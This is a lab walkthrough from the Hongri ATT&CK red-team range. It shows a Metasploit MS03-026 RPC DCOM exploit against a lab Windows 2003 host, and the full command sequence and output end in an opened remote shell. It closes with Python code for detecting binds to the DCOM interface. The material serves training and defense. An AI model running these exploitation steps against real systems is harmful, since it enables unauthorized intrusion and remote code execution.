Environment
- Target: 红日靶场 ATT&CK red team evaluation 01 - win2k3 192.168.52.141
- Attacker machine: 32-bit Kali 172.24.4.7
- Internal network traffic forwarding already set up
MS03-026 reproduction steps
Vulnerability overview
MS03-026 is a remotely exploitable buffer overflow vulnerability affecting multiple versions of the Microsoft Windows operating system. The flaw lies in the RPC interface, specifically in the implementation of the Distributed Component Object Model (DCOM) interface, and it allows an attacker to execute malicious code on the target host.
At its core, the problem is in the part of RPC that handles message exchange over TCP/IP: a remote attacker can exploit it to run arbitrary instructions with Local System privileges. Specifically, the affected component is the DCOM interface that runs over RPC and processes DCOM object activation requests sent by client machines to the server (for example, requests containing UNC paths). An attacker triggers the vulnerability by sending a malformed RPC DCOM request to the target.
A family of worms (such as Blaster) is known to have exploited this vulnerability in the wild. To defend against it, the recommendation is to reconnect the system to the network and apply the patch described in MS03-026; DCOM can also be disabled where site requirements allow, which is an additional mitigation.
In summary, MS03-026 is a serious vulnerability that allows remote code execution. Protecting systems requires applying the patch promptly and taking further measures such as disabling DCOM.
Run: msfconsole
┌──(kali㉿kali)-[~]
└─$ msfconsole
Metasploit tip: View missing module options with show missing
=[ metasploit v6.4.9-dev ]
+ -- --=[ 2420 exploits - 1248 auxiliary - 423 post ]
+ -- --=[ 1468 payloads - 47 encoders - 11 nops ]
+ -- --=[ 9 evasion ]
Metasploit Documentation: https://docs.metasploit.com/
Run: search ms03-026
msf6 > search ms03-026
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/dcerpc/ms03_026_dcom 2003-07-16 great Yes MS03-026 Microsoft RPC DCOM Interface Overflow
Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/dcerpc/ms03_026_dcom
Run: use 0 or use exploit/windows/dcerpc/ms03_026_dcom
msf6 > use 0
[*] Using configured payload windows/shell/reverse_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) >
Run: set rhost 192.168.52.141
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set rhost 192.168.52.141
rhost => 192.168.52.141
Run: set lhost 172.24.4.7
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set lhost 172.24.4.7
lhost => 172.24.4.7
Run: set payload generic/shell_bind_tcp
msf6 exploit(windows/dcerpc/ms03_026_dcom) > set payload generic/shell_bind_tcp
payload => generic/shell_bind_tcp
Run: show options
msf6 exploit(windows/dcerpc/ms03_026_dcom) > show options
Module options (exploit/windows/dcerpc/ms03_026_dcom):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS 192.168.52.141 yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 135 yes The target port (TCP)
Payload options (generic/shell_bind_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LPORT 4444 yes The listen port
RHOST 192.168.52.141 no The target address
Exploit target:
Id Name
-- ----
0 Windows NT SP3-6a/2000/XP/2003 Universal
View the full module info with the info, or info -d command.
Run: exploit or run
msf6 exploit(windows/dcerpc/ms03_026_dcom) > exploit
[*] 192.168.52.141:135 - Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] 192.168.52.141:135 - Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0@ncacn_ip_tcp:192.168.52.141[135] ...
[*] 192.168.52.141:135 - Calling DCOM RPC with payload (1648 bytes) ...
[*] Started bind TCP handler against 192.168.52.141:4444
[*] Command shell session 1 opened (172.24.4.7:34395 -> 192.168.52.141:4444) at 2024-06-09 12:23:25 -0400
Shell Banner:
Microsoft Windows [Version 5.2.3790]
-----
C:\WINDOWS\system32>ipconfig
ipconfig
Windows IP Configuration
Ethernet adapter Local Area Connection:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.52.141
Subnet Mask . . . . . . . . . . . : 255.255.255.0
Default Gateway . . . . . . . . . : 192.168.52.2
Shell session opened successfully. (Note that the payload chosen here is a bind shell: as the output shows, Metasploit connected to port 4444 on the target rather than receiving a reverse connection, so the lhost setting was not actually used.)
PS: for learning only; corrections from the experts are welcome.
Please make sure you are authorized to use these techniques and that your actions comply with laws, regulations and ethical standards. This information is for educational and research purposes only.
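From the defender's side, the most useful artifact in the output above is the bind line: the module binds to interface UUID 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 on TCP 135 before sending its request. As an added example (not code from the original post or from Metasploit), the Python below parses a DCE/RPC bind PDU and flags any bind that requests that interface, which is the kind of check a network monitor can apply to port 135 traffic. The PDU it inspects is constructed inline; the NDR transfer-syntax UUID is the well-known standard value, and OTHER_IFACE is a constructed placeholder for the negative case.

```python
import struct
import uuid

# Interface UUID the Metasploit output above binds to (taken from this page)
DCOM_ACTIVATION_IFACE = uuid.UUID("4d9f4ab8-7d1c-11cf-861e-0020af6e7c57")
# Standard NDR transfer syntax v2; used only to build the constructed sample PDU
NDR_SYNTAX = uuid.UUID("8a885d04-1ceb-11c9-9fe8-08002b104860")
# Constructed placeholder for an unrelated interface (negative test case)
OTHER_IFACE = uuid.UUID("12345678-1234-5678-1234-567812345678")

BIND_PTYPE = 11  # DCE/RPC packet type for "bind"

def build_bind(iface, iface_ver=0):
    """Build a minimal little-endian DCE/RPC bind PDU (constructed sample, not captured traffic)."""
    ctx = struct.pack("<HBB", 0, 1, 0)                        # p_cont_id, n_transfer_syn, reserved
    ctx += iface.bytes_le + struct.pack("<I", iface_ver)      # abstract syntax: uuid + version
    ctx += NDR_SYNTAX.bytes_le + struct.pack("<I", 2)         # transfer syntax: uuid + version
    body = struct.pack("<HHIBBH", 5840, 5840, 0, 1, 0, 0) + ctx  # frag sizes, assoc group, n_context_elem
    # rpc_vers, minor, ptype, pfc_flags (first|last), packed_drep (LE), frag_length, auth_length, call_id
    hdr = struct.pack("<BBBB4sHHI", 5, 0, BIND_PTYPE, 0x03, b"\x10\x00\x00\x00", 16 + len(body), 0, 1)
    return hdr + body

def bind_interfaces(pdu):
    """Return [(uuid, version)] for every abstract syntax a bind PDU requests; [] if not a bind."""
    if len(pdu) < 28:
        raise ValueError("truncated DCE/RPC header")
    vers, _minor, ptype, _flags, drep, frag_len = struct.unpack_from("<BBBB4sH", pdu, 0)
    if vers != 5 or ptype != BIND_PTYPE:
        return []
    if drep[0] >> 4 != 1:
        raise ValueError("only little-endian data representation is handled")
    if frag_len > len(pdu):
        raise ValueError("frag_length exceeds captured data")
    n_ctx = pdu[24]            # number of presentation contexts requested
    off, found = 28, []
    for _ in range(n_ctx):
        if off + 24 > frag_len:
            raise ValueError("truncated presentation context")
        _cid, n_ts, _r = struct.unpack_from("<HBB", pdu, off)
        iface = uuid.UUID(bytes_le=pdu[off + 4:off + 20])
        (iface_ver,) = struct.unpack_from("<I", pdu, off + 20)
        found.append((iface, iface_ver))
        off += 24 + 20 * n_ts  # skip this context's transfer-syntax list
    return found

def is_dcom_activation_bind(pdu):
    """True if the bind requests the DCOM activation interface seen in the output above."""
    return any(iface == DCOM_ACTIVATION_IFACE for iface, _ver in bind_interfaces(pdu))
```

A bind to this interface is normal for legitimate DCOM activation, so on a real network the check is a trigger for context (source host, follow-up request size, the session on 4444 that the log shows) rather than an alert on its own.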